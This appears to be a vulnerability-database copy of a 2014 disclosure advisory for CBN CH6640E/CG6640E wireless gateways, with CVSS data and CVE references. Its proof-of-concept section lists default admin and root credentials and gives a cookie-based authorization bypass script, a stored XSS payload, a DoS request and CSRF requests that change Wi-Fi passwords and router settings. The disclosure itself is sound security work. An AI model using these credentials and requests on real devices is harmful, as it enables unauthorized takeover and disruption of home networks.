Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2014-5203
HistoryOct 25, 2014 - 12:00 a.m.

CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities

2014-10-2500:00:00
Gjoko Krstic
zeroscience.mk
206

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

6.8 Medium

AI Score

Confidence

Low

0.045 Low

EPSS

Percentile

92.5%

JSON

Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014

Summary

The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.

Description

The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service.

Vendor

Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>

Affected Version

Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0

Tested On

Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7

Vendor Status

N/A

PoC

cbn_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://cxsecurity.com/issue/WLB-2014100162&gt;
[2] <http://www.exploit-db.com/exploits/35075/&gt;
[3] <http://osvdb.org/show/osvdb/113836&gt;
[4] <http://osvdb.org/show/osvdb/113837&gt;
[5] <http://osvdb.org/show/osvdb/113838&gt;
[6] <http://osvdb.org/show/osvdb/113839&gt;
[7] <http://osvdb.org/show/osvdb/113840&gt;
[8] <http://osvdb.org/show/osvdb/113841&gt;
[9] <http://osvdb.org/show/osvdb/113842&gt;
[10] <http://osvdb.org/show/osvdb/113843&gt;
[11] <http://packetstormsecurity.com/files/128860&gt;
[12] <http://www.securityfocus.com/bid/70762&gt;
[13] <http://xforce.iss.net/xforce/xfdb/98328&gt;
[14] <http://xforce.iss.net/xforce/xfdb/98329&gt;
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653&gt;
[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654&gt;
[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655&gt;
[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656&gt;
[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657&gt;
[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653&gt;
[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654&gt;
[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655&gt;
[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656&gt;
[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657&gt;

Changelog

[25.10.2014] - Initial release
[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12]
[30.10.2014] - Added reference [13] and [14]
[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities


Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
                  Hardware version: 1.0
                  Firmware version: CH6640-3.5.11.7-NOSH
                  Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
                  DOCSIS mode: DOCSIS 3.0


Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.

Default credentials:

admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
                configuration information.

Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.

Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php


04.10.2014

---



Authorization Bypass Information Disclosure Vulnerability
#########################################################

http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml

Set cookie: userData to root or admin, reveals additional pages/info.

--

</p>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>


--


Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################

GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1


Stored Cross-Site Scripting (XSS) Vulnerability
###############################################

Cookie: userData
Value: hax0r"&gt;<script>alert(document.cookie);</script>

--


<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";



--


Cross-Site Request Forgery (CSRF) Vulnerability
###############################################

DDNS config:
------------

GET http://192.168.0.1/basicDDNS.html?DdnsService=1&amp;DdnsUserName=a&amp;DdnsPassword=b&amp;DdnsHostName=c# HTTP/1.1


Change wifi pass:
-----------------

GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&amp;sMode=7&amp;sbMode=1&amp;encAlgm=3&amp;psKey=NEW_PASSWORD&amp;rekeyInt=0 HTTP/1.1


Add static mac address (static assigned dhcp client):
-----------------------------------------------------

GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&amp;MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&amp;LeasedIP=8 HTTP/1.1


Enable/Disable UPnP:
--------------------

GET http://192.168.0.1/setAdvancedOptions.html?action=apply&amp;instance=undefined&amp;UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&amp;instance=undefined&amp;UPnP=2 HTTP/1.1 (disable)

</body></html>

Related

prion 5
nvd 5
cve 5
cvelist 5
prion
prion
Default credentials
2014-11-06 15:55:00
Cross site request forgery (csrf)
2014-11-06 15:55:00
Cross site scripting
2014-11-06 15:55:00
nvd
nvd
CVE-2014-8654
2014-11-06 15:55:10
CVE-2014-8657
2014-11-06 15:55:10
CVE-2014-8653
2014-11-06 15:55:10
cve
cve
CVE-2014-8657
2014-11-06 15:55:10
CVE-2014-8656
2022-10-03 16:20:38
CVE-2014-8653
2014-11-06 15:55:10
cvelist
cvelist
CVE-2014-8654
2014-11-06 15:00:00
CVE-2014-8653
2014-11-06 15:00:00
CVE-2014-8657
2014-11-06 15:00:00

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

6.8 Medium

AI Score

Confidence

Low

0.045 Low

EPSS

Percentile

92.5%

JSON
Related for ZSL-2014-5203
prion5nvd5cve5cvelist5